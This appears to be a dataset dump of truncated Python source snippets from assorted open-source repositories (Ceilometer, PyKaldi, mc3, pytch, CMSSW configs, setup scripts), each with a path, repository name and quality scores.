ceilometer/opts.py | andymcc/ceilometer | 0 | 12796235 | # Copyright 2014 eNovance
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, so... | 0.964844 | 1 |
vktrainer/models.py | pmourlanne/VKTrainer | 0 | 12796236 | # -*- coding: utf-8 -*-
import json
import os
import random
from shutil import copyfile
from flask import url_for, current_app as app
from flask_login import UserMixin
from sqlalchemy import func, desc
# from vktrainer import db, app, login_manager
from vktrainer import db, login_manager
from vktrainer.utils import... | 2.375 | 2 |
mc3/stats/prayer.py | alulujasmine/mc3 | 6 | 12796237 | <reponame>alulujasmine/mc3
# Copyright (c) 2015-2021 <NAME> and contributors.
# mc3 is open-source software under the MIT license (see LICENSE).
__all__ = [
"prayer_beads",
]
def prayer_beads(data=None, nprays=0):
"""
Implement a prayer-bead method to estimate parameter uncertainties.
Parameters
... | 2.546875 | 3 |
kaldi/lm/__init__.py | mxmpl/pykaldi | 916 | 12796238 | from ._arpa_file_parser import ArpaParseOptions
from ._arpa_lm_compiler import *
from ._const_arpa_lm import *
from ._kaldi_rnnlm import *
__all__ = [name for name in dir()
if name[0] != '_'
and not name.endswith('Base')]
| 1.242188 | 1 |
Python/CeV/Exercicios/ex38.py | WerickL/Learning | 0 | 12796239 | <filename>Python/CeV/Exercicios/ex38.py<gh_stars>0
from math import floor
n1 = float(input('Digite um número inteiro:'))
n2 = float(input('Digite outro número inteiro:'))
if floor(n1) > floor(n2):
print('O primeiro número é maior que o segundo!')
elif floor(n1) < floor(n2):
print('O segundo número é maior que o... | 4.09375 | 4 |
Implementations/Kattis/others/02/Impl-02-2/armystrenghteasy.py | MilladMuhammadi/Competitive-Programming | 0 | 12796240 | for i in range(int(input())):
input()
Ng,Nm = map(int,input().split())
g=list(map(int,input().split()))
m=list(map(int,input().split()))
g.sort()
m.sort()
gg,mm=0,0
while (gg<Ng and mm<Nm):
if (m[mm]<=g[gg]):
mm+=1
else:
gg+=1
if (gg==Ng):
... | 3.296875 | 3 |
raspberrypi/python/python1_test.py | dambergn/programing-examples | 0 | 12796241 | <filename>raspberrypi/python/python1_test.py
#!/usr/bin/python
print 'Python1 Test Sucessfull' | 1.070313 | 1 |
Python/pyworkout/modules_and_packages/menu/__init__.py | honchardev/Fun | 0 | 12796242 | from menu.menu import menu | 1.0625 | 1 |
test/integration/ggrc/models/test_document.py | Killswitchz/ggrc-core | 0 | 12796243 | <reponame>Killswitchz/ggrc-core<filename>test/integration/ggrc/models/test_document.py<gh_stars>0
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Integration tests for Document"""
from ggrc.models import all_models
from integration.ggrc import TestCas... | 2.140625 | 2 |
vdpwi/utils/preprocess.py | achyudh/castor | 132 | 12796244 | import argparse
import os
from scipy.special import erf
from scipy.stats import truncnorm
import numpy as np
import data
def build_vector_cache(glove_filename, vec_cache_filename, vocab):
print("Building vector cache...")
with open(glove_filename) as f, open(vec_cache_filename, "w") as f2:
for line i... | 2.34375 | 2 |
unicode2koi8r.py | SlimyMonkey/divePython | 1 | 12796245 | <reponame>SlimyMonkey/divePython
"""Convert Cyrillic from iso-8859-1 Unicode-encoded to KOI8-R-encoded
This script is used during the build process of the Russian translation
of "Dive Into Python" (http://diveintopython.org/).
It takes one argument, which can be either an HTML file or a directory.
If a file, it conve... | 2.71875 | 3 |
dramkit/optimizer/pso.py | Genlovy-Hoo/dramkit | 0 | 12796246 | <reponame>Genlovy-Hoo/dramkit
# -*- coding: utf-8 -*-
import time
import numpy as np
from dramkit.gentools import isnull
from dramkit.optimizer.utils_heuristic import rand_init
def pso(objf, func_opter_parms):
'''
粒子群优化算法(Particle Swarm Optimization) PSO algorithm
TODO
----
目前仅考虑自变量连续实数情况，以... | 2.109375 | 2 |
PythonTest/t32.py | Hyyyyyyyyyy/acm | 0 | 12796247 | <gh_stars>0
the_count = [1,2,3,4,5]
fruits = ['apple','orange','pear','apricot']
change = [1,'pennies',2,'dimes',3,'quarters']
for num in the_count:
print "This is count %d" % num
for i in fruits:
print "A fruit of type: %s" % i
for i in change:
print "I got %r" % i
elements = []
j = "5"
for i in range(0,... | 3.6875 | 4 |
RecoLocalTracker/SubCollectionProducers/python/ClusterMultiplicityFilter_cfi.py | ckamtsikis/cmssw | 852 | 12796248 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
tifClusterFilter = cms.EDFilter("ClusterMultiplicityFilter",
MaxNumberOfClusters = cms.uint32(300),
ClusterCollection = cms.InputTag('siStripClusters')
)
| 1.15625 | 1 |
src/lib/pytch/actor.py | Liampobob/pytch-vm | 0 | 12796249 | <gh_stars>0
from pytch.syscalls import (
play_sound,
registered_instances,
wait_seconds,
)
from pytch.project import FRAMES_PER_SECOND
def _is_number(x):
return isinstance(x, int) or isinstance(x, float)
class Actor:
Sounds = []
_appearance_names = None
def start_sound(self, sound_name... | 2.5 | 2 |
setup.py | CSCfi/beacon-network | 3 | 12796250 | <reponame>CSCfi/beacon-network<gh_stars>1-10
from setuptools import setup
setup(
name="beacon_network",
version="1.4.0",
description="Beacon Network services",
long_description_content_type="text/markdown",
project_urls={
"Source": "https://github.com/CSCfi/beacon-network",
},
... | 1.703125 | 2 |